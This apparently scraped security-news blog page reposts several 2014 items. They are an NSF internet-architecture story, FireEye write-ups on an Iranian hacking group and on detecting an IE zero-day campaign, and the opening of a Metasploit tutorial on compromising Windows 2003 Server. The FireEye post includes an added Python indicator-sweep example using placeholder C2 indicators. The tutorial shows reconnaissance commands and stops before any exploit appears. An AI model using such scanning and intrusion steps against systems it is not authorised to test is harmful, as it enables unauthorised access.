Benny's Hub About Cyber Security: events, news, technologies and products about cyber security.

2014-05-17 [infosecurity-magazine] NSF Awards $15m to Develop Secure Internet Architecture<h2 class="article-intro" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 1.3em; font-weight: 400; line-height: 1.4em; margin: 0px 0px 14px;">
The National Science Foundation (NSF) is awarding $15 million in grants for the development, deployment and testing of future internet architectures that are designed to enhance security, respond to emerging service challenges and increase scalability.</h2>
<div class="article-content" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 12px;">
<div style="line-height: 1.4em; margin-bottom: 12px;">
In 2010, the Directorate for Computer and Information Science and Engineering (CISE) at the NSF <a href="http://www.nsf.gov/news/news_summ.jsp?cntn_id=117611&org=OLPA&from=news" style="color: #e5141a; outline: none;" target="_blank">announced</a> awards for four projects, each worth up to $8 million over three years, as part of the Future Internet Architecture (FIA) program. The awards enabled researchers at dozens of institutions across the US to pursue new ways to build a more trustworthy and robust internet. That was mostly an exploratory phase; now, new grants are funding trial deployments for three of them to test the concepts in a real-world scenario.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“The objective of the new awards is to move the FIA efforts from the design stage to piloted deployments that assess how the designs work at large-scale and within challenging, realistic environments,” the NSF said. “Cities, non-profit organizations, academic institutions and industrial partners across the nation will collaborate with researchers to test the new designs.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Two notable projects from the cybersecurity perspective are Named Data Networking (NDN) and eXpressive Internet Architecture (XIA). The third awardee is the MobilityFirst project.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
"These projects are just the beginning of what it would take to create a full-scale Future Internet," said Keith Marzullo, director for NSF's Computer and Network Systems Division, "but the ultimate goal is the design and deployment of a network that serves all the needs of society."</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
NDN will trade in the internet’s existing client-server model of interaction for a new model centered on content creation, dissemination and delivery. It will include mechanisms to support secure content-oriented functionality, regardless of the specific physical location where the content resides. The architecture thus moves the communication paradigm from today's focus on "where", i.e., addresses, servers and hosts, to "what", i.e., the content that users and applications care about.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“By naming data instead of their location (IP address), NDN transforms data into first-class entities,” the NSF explained. “While the current Internet secures the communication channel or path between two communication points and sometimes the data with encryption, NDN secures the content and provides essential context for security.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
This approach allows the decoupling of trust in data from trust in hosts and servers, enabling trustworthiness as well as several radically scalable communication mechanisms; for example, automatic caching to optimize bandwidth and the potential to move content along multiple paths to the destination. This project addresses the technical challenges in creating NDN, including routing scalability, fast forwarding, trust models, network security, content protection and privacy, and a new fundamental communication theory enabling its design.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The NDN project is partnering with Open mHealth, a non-profit, patient-centric health ecosystem, and with UCLA Facilities Management, which operates the second largest Siemens building monitoring system on the West Coast, to test actual implementation.<br /><br />When it comes to XIA, researchers at Carnegie-Mellon University and three other institutions are planning to use a $5 million, two-year grant to test a next-generation internet architecture they've developed, geared to eliminate bottlenecks and incorporate intrinsic security features that can assure users that the websites they access and documents they download are legitimate.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The trials will involve delivering online video on a national scale, and setting up a vehicular network in Pittsburgh.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
XIA also includes caching features – the researchers said the network will be able “to directly access content where it is most accessible, not necessarily on a host website.” The details of the actual deployments have yet to be worked out, <a href="http://www.cmu.edu/news/stories/archives/2014/may/may13_internetarchitecture.html" style="color: #e5141a; outline: none;" target="_blank">according to</a> Peter Steenkiste, professor of computer science and electrical and computer engineering at Carnegie-Mellon and XIA's principal investigator. However, in the online video case, it will probably involve various nodes spread across the US.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
In that trial, the researchers will test the XIA network's ability to eliminate bottlenecks in the transmission of video, which now accounts for a majority of internet traffic and is slated to grow and strain the network further. Loss of even a few data packets in a high-definition video stream is of course readily apparent, Steenkiste noted, so this will be a critical test of XIA's reliability.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Meanwhile, vehicles can use wireless communication channels called dedicated short-range communications, or DSRC, that are similar to Wi-Fi. Creating DSRC networks is challenging, however, because cars and trucks quickly pass from one DSRC access point to the next. Again, because XIA enables computer users to directly access content wherever it might be on the network, rather than always accessing a host website, it should enable vehicles to solve this issue.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Plans are underway to deploy XIA in a network in and around the CMU campus, or possibly piggybacking atop downtown Pittsburgh's free Wi-Fi network, to enable vehicles to share information about road and traffic conditions and to enable occupants to access the internet and entertainment options.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Simply finding a way to evaluate network architectures will be part of the research effort, Steenkiste said, noting no widely accepted benchmarks yet exist. "It's not like the network is simply faster — it's more abstract than that," he explained. Security and reliability are some of the properties that must be evaluated.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
"These deployments will leverage, and enable us to deepen, our work on secure network operations, including providing a highly available infrastructure and secure authentication mechanisms," Steenkiste said. "They will enable us to build and test a robust XIA network and establish best practices for using our architecture, including support for mobility and enhanced cybersecurity."</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
XIA is designed to evolve with the internet, so that future users will be able to communicate with entities that no one has dreamed of yet, researchers said. It is also being architected so that it can be deployed piecemeal, so that the entire internet need not be transformed before people can start seeing XIA's benefits.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
<a href="http://www.infosecurity-magazine.com/view/38434/nsf-awards-15m-to-develop-secure-internet-architecture/" target="_blank">http://www.infosecurity-magazine.com/view/38434/nsf-awards-15m-to-develop-secure-internet-architecture/</a></div>
</div>
2014-05-17 [fireeye] Operation Saffron Rose<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
There is evolution and development underway within Iranian-based hacker groups that coincides with Iran’s efforts at controlling political dissent and expanding offensive cyber capabilities. The capabilities of threat actors operating from Iran have traditionally been considered limited and have focused on politically motivated website defacement and DDoS attacks.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our team has <a href="http://www.fireeye.com/resources/pdfs/fireeye-operation-saffron-rose.pdf" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">published a report</a> that documents the activities of an Iran-based group, known as the <strong>Ajax Security Team</strong>, which has been targeting both US defense companies and those in Iran who use popular anti-censorship tools to bypass the country's Internet censorship controls.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
This group, which has its roots in popular Iranian hacker forums such as <em>Ashiyane</em> and <em>Shabgard</em>, has engaged in website defacements since 2010. However, by 2014, this group had transitioned to malware-based espionage, using a methodology consistent with other advanced persistent threats in this region.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
It is unclear if the Ajax Security Team operates in isolation or if they are a part of a larger coordinated effort. We have observed this group leverage varied social engineering tactics as a means to lure their targets into infecting themselves with malware. They use malware tools that do not appear to be publicly available. Although we have not observed the use of exploits as a means to infect victims, members of the Ajax Security Team have previously used exploit code in web site defacement operations.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The objectives of this group are consistent with Iran’s efforts at controlling political dissent and expanding offensive cyber capabilities, but we believe that members of the group may also be dabbling in traditional cybercrime. This indicates that there is a considerable grey area between the cyber espionage capabilities of Iran’s hacker groups and any direct Iranian government or military involvement.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Although the Ajax Security Team’s capabilities remain unclear, we believe that their current operations have been somewhat successful. We assess that if these actors continue the current pace of their operations they will improve their capabilities in the mid-term.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
To view a full version of the report on “Operation Saffron Rose,” please visit: <a href="http://www.fireeye.com/resources/pdfs/fireeye-operation-saffron-rose.pdf" style="color: #4298b5; font-weight: bold; text-decoration: none;">http://www.fireeye.com/resources/pdfs/fireeye-operation-saffron-rose.pdf</a>.</div>
2014-05-17 [fireeye] Managed Defense – Reducing the Time to Detect and Resolve Threats<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Working in <a href="http://www.fireeye.com/products-and-solutions/managed-defense.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">FireEye Managed Defense</a> presents an interesting perspective into some of the most advanced threats. Our service meshes a team of experts with a powerful technology stack. We combine host- and network-based forensic technologies with highly experienced and skilled analysts, incident responders, and reverse engineers around the clock and across the globe. The foundation of Managed Defense is our partnership with our customers to detect evil and contain compromise. We work together to investigate the compromise, determine a remediation strategy, extract intelligence, and deploy new intelligence into our operations. This ability to leverage expertise to create intelligence and apply it consistently to the endpoint and to network traffic enables our team to adapt and respond quickly. In the face of a campaign like <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Operation Clandestine Fox</a>, it ensures our clients are protected from even the most advanced attacker groups.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The last 10 days have shown us once again why our mission of defeating the adversary is so critical. On Friday, April 25, we discovered a new IE 0-day exploited as part of a campaign later dubbed <a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/05/operation-clandestine-fox-now-attacking-windows-xp-using-recently-discovered-ie-vulnerability.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Operation Clandestine Fox</a>. In this post, we present an inside look into the discovery and exploitation of this vulnerability and how we were able to help not only the original Managed Defense customer but also others.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b>The Initial Detection</b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
This story begins on April 25, when a group of our analysts working with a Managed Defense client detected an active APT backdoor using one of the many indicators of compromise (IOCs) we check for within Managed Defense.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At first glance, it might have been reasonable to characterize the initial compromise as fairly typical. We knew at the time that the attackers had been able to deploy at least one backdoor, and were communicating interactively with it to escalate the attack. After containing the host, the usual questions emerged:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">How was the machine compromised?</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Was the scope of the compromise limited to a single host?</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">What did the attackers accomplish?</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Who was the Threat Actor behind the attack?</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
That evening, a deeper analysis of the host revealed that the backdoor was resident only in memory and communicating out to remote attacker infrastructure. While we had seen <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">similar malware variants</a>, analysis of JavaScript and Flash objects from this host indicated that we were possibly at the forefront of discovering a previously unknown vulnerability being exploited.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Evaluating the malware and the tactics employed pointed to a threat group that we had seen before. This group had been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b>Expanding Detection Across Managed Defense</b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The new 0-day was, of course, the big news. But just as important to our Managed Defense customers were lesser-known details that we tend to dig up every day on threats big and small.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
For instance, during the early stages of investigation, we produced evidence of the targeted spear phishing campaign that served as the initial attack vector. The campaign morphed four times, altering the content and remote locations of the payloads. Not only were we able to help our initial client detect and contain the threat, but continuously updating our applied intelligence led to other detections of the same campaign elsewhere.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Immediately after we deployed host-based indicators for the first-stage backdoor as well as network-based indicators for the command and control (C2) channels, we found a compromise at two additional Managed Defense customers. This meant we could pivot quickly into a focused investigation and response for our other customers – all of this in a matter of hours.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The analysis performed within the first few hours allowed our team to deploy these network-based indicators across the globe and ensure that we were positioned between our customers and their adversaries to detect the attack early in the attack lifecycle. Not long after, as an added countermeasure, we further augmented our detection capability by deploying host-based indicators specifically focused on rapidly surfacing additional variants of the first-stage backdoor. All told, we built new intelligence around the phishing emails, the backdoors used, use of the 0-day exploit, and evidence of backdoor installation via an in-memory mutex. This is handy as memory-only enterprise sweeps are much faster than filesystem ones.</div>
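The paragraph above describes two indicator layers applied side by side: host-based indicators (the first-stage backdoor's in-memory mutex, surfaced by a memory-only sweep) and network-based indicators for the C2 channel. The following is an added illustration of that workflow and is not FireEye's code or tooling. Every indicator value, hostname, address and endpoint record in it is a constructed placeholder, and the function names (`sweep_host`, `sweep_network`, `sweep`) are assumptions made for the example.

```python
"""Indicator sweep across endpoint telemetry.

Added example, not FireEye code. It shows how host-based indicators (a
backdoor's in-memory mutex, a process name) and network-based indicators
(C2 hostnames and addresses) are applied to endpoint records, and why both
layers are kept: a variant that changes its host artifacts can still be
caught on the wire. Every indicator and telemetry value below is a
constructed placeholder.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Constructed host-based indicators (placeholders, not real IOCs).
HOST_IOCS: Dict[str, Set[str]] = {
    "mutexes": {"Global\\PLACEHOLDER_BACKDOOR_MUTEX"},
    "process_names": {"placeholder-backdoor.exe"},
}

# Constructed network-based indicators for the C2 channel (placeholders;
# 203.0.113.0/24 is a documentation address range).
NETWORK_IOCS: Dict[str, Set[str]] = {
    "c2_hosts": {"c2.placeholder.invalid"},
    "c2_ips": {"203.0.113.77"},
}


@dataclass
class Endpoint:
    """One endpoint's telemetry: live mutexes and processes from a memory
    sweep, plus observed outbound connections as (dest_host, dest_ip)."""
    hostname: str
    mutexes: Set[str] = field(default_factory=set)
    processes: Set[str] = field(default_factory=set)
    connections: List[Tuple[str, str]] = field(default_factory=list)


def sweep_host(ep: Endpoint) -> List[str]:
    """Host-based matches: mutex and process-name indicators."""
    hits = [f"host:mutex:{m}" for m in sorted(ep.mutexes & HOST_IOCS["mutexes"])]
    hits += [f"host:process:{p}" for p in sorted(ep.processes & HOST_IOCS["process_names"])]
    return hits


def sweep_network(ep: Endpoint) -> List[str]:
    """Network-based matches: known C2 hostname or address in outbound connections."""
    hits = []
    for host, ip in ep.connections:
        if host in NETWORK_IOCS["c2_hosts"]:
            hits.append(f"net:host:{host}")
        if ip in NETWORK_IOCS["c2_ips"]:
            hits.append(f"net:ip:{ip}")
    return hits


def sweep(endpoints: List[Endpoint]) -> Dict[str, List[str]]:
    """Return {hostname: [indicator hits]} for every endpoint with a match."""
    results: Dict[str, List[str]] = {}
    for ep in endpoints:
        hits = sweep_host(ep) + sweep_network(ep)
        if hits:
            results[ep.hostname] = hits
    return results


# Constructed telemetry: ws-01 is the fully matching first-stage infection,
# ws-02 is clean, ws-03 is a variant with different host artifacts and a new
# C2 hostname that still reuses the known C2 address.
SAMPLE_ENDPOINTS = [
    Endpoint("ws-01",
             mutexes={"Global\\PLACEHOLDER_BACKDOOR_MUTEX", "Local\\BENIGN_APP_MUTEX"},
             processes={"explorer.exe", "iexplore.exe"},
             connections=[("c2.placeholder.invalid", "203.0.113.77")]),
    Endpoint("ws-02",
             mutexes={"Local\\BENIGN_APP_MUTEX"},
             processes={"explorer.exe"},
             connections=[("www.example.com", "198.51.100.5")]),
    Endpoint("ws-03",
             mutexes={"Local\\BENIGN_APP_MUTEX"},
             processes={"explorer.exe"},
             connections=[("cdn.placeholder.invalid", "203.0.113.77")]),
]

if __name__ == "__main__":
    for host, hits in sweep(SAMPLE_ENDPOINTS).items():
        print(host, hits)
```

Running the sweep flags ws-01 on both layers and ws-03 on the network layer alone, which is the situation the article describes: once the C2 indicators are deployed, a variant that slips past the host indicators still surfaces, and the host-based hit on ws-01 comes from the mutex alone, which is why a memory-only sweep is enough to triage it quickly.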
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Within 24 hours, we had gathered and reviewed results from nearly a million endpoints across the Managed Defense customer base. The additional activity we observed solidified our theory that at least one APT threat actor group was broadly and aggressively targeting an array of key industries, including aerospace, energy, financial, and the federal sector.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
We published all of the intelligence we could glean as the investigation progressed so our customers could have insight on the threat actor and their tactics. This also supported customers discussing the threat with their peer groups to help drive the ultimate goal of protection, remediation and recovery.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our work here resulted in new detection capabilities to find compromise through the attack lifecycle, ranging from initial targeting to successful exploitation and subsequent escalation through the establishment of more persistent backdoors. Thanks to our rapid deployment of relevant intelligence across our platform and the quick action of our clients, the eleven Managed Defense clients targeted by this campaign were all able to successfully contain the compromises at the initial stage, preventing further attacker activity within client environments.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b>Looking Back (and Forward)</b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Given the relative ubiquity of the vulnerability and the scope of the opportunity presented to attackers, we were unsurprised to see the attackers carry on through the week of April 28th. The Managed Defense team continued to work with our customers in a few ways:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">We continued to monitor our customers’ global infrastructure 24×7 for related activity;</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Over the course of 7 days, we published compromise reports that described related attacker activity at a dozen unique enterprises, spanning multiple industries;</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">We were easily able to pivot into Incident Response where necessary and applied additional horsepower to analyze a variety of forensic artifacts and accelerate response time;</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">We published additional intelligence to our customers so that each team could augment their own legacy detection capabilities and potentially prevent compromise.</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With <a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Microsoft’s recent patch release</a>, we’ve already witnessed a shift in attacker activity, including a substantial decrease in phishing activity. This once wide-open door is closing shut, but we know our adversaries’ unrelenting search for new attack surfaces undoubtedly continues. For those of us in Managed Defense, events like those detailed above are common occurrences, but they nonetheless serve as inspiring reminders of the gravity of our mission: to help protect our clients from skilled and determined adversaries. The best analysts in the industry, a global deployment of detection technology, superior threat intelligence, and an ability to rapidly escalate and deploy that new intelligence, combined with the close partnerships we have with our clients, ensure we are well prepared for the inevitable next round of attacks.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/corporate/2014/05/managed-defense-reducing-the-time-to-detect-and-resolve-threats.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/05/managed-defense-reducing-the-time-to-detect-and-resolve-threats.html</a></div>
2014-05-08 [infosecinstitute] Exploiting Windows 2003 Server Reverse Shell<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This paper explains several Metasploit approaches to exploiting a vulnerable Windows 2003 Server operating system, in particular through <em>msfconsole</em> and <em>msfcli</em>, and demonstrates how to gain access to the target computer across the whole hacking life cycle. Metasploit is useful in penetration testing both for detecting vulnerabilities in a Windows 2003 target and for exploiting them, and it can be used by offensive and defensive professionals alike.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Exploitation is about identifying a system’s potential exposures and taking advantage of its weaknesses. We use Nmap and Metasploit to identify potentially vulnerable services, and from there launch an exploit that gives us access to the system. This paper begins by covering the basics of running an exploit with <em>msfconsole</em> and <em>msfcli</em> and compromising a target based on a discovered vulnerability.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Prerequisites</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The reader is expected to be comfortable with Metasploit commands and familiar with configuring security settings such as the firewall and port configuration in the Windows 2003 operating system. In addition, the user machine must be set up with the following tools:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Backtrack 5 or Kali Linux</li>
<li>Metasploit Modules (msfconsole)</li>
<li>Windows 2003 Server</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Scanning the Target</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Windows 2003 Server is still used in several organizations to run web servers, database servers, directory servers, FTP servers and mail servers, but unfortunately it carries several vulnerabilities that make it an easy target for attackers seeking unauthorized access. The question is how attackers exploit an unpatched operating system; in other words, what the modus operandi of such an intrusion looks like.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The first step in this process is to determine whether the target machine is live or down. If it is live, port scanning follows, which determines whether each TCP and UDP port on the target is open or closed. An open port means that a network service such as FTP, HTTPS, POP or SMB is listening on it. If that network service is vulnerable, the attacker can use this information to speed up the vulnerability analysis process.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Port scanning can be carried out with one of the specialized tools, for instance Nmap or Metasploit itself. Nmap has gained favor and comes built into Backtrack and Kali Linux as a vulnerability assessment tool; it runs directly in the command shell and generally takes the target IP address or DNS name as a parameter. Though there may be plenty of services running on a particular computer, here we scan the target machine to discover specific running services, namely FTP, HTTP, POP and SMB, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We can easily conclude from the above output that FTP, HTTP, and SMB services are running on the target machine and, in fact, are not behind a firewall. So, we could penetrate that computer by exploiting these open services.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We can also enumerate the open services on a target computer by using Metasploit's own port scanning modules. To do so, run <em>msfconsole</em> and first search for the available port scanning modules as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_25313" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; position: relative !important;">
<pre><code class="plain plain">msf > search portscan</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW3.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW3.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Metasploit has a number of port scanning modules and offers several scanning methods, notably SYN, XMAS, and ACK scans. Here we proceed with the SYN scanning method, so select the port scanning module with the <em>use</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_537939" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; position: relative !important;">
<pre><code class="plain plain">msf > use scanner/portscan/syn</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Every module has specific options or parameters, which can be displayed with the <em>show options</em> command as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_663155" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; position: relative !important;">
<pre><code class="plain plain">msf > show options</code></pre>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The <em>show options</em> command displays the module's parameters, but we are only interested in the RHOSTS and THREADS options, which take the target computer's IP address and the number of threads to run, as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW4.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW4.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Finally, launch the port scanning module using the <em>run</em> command as follows:</div>
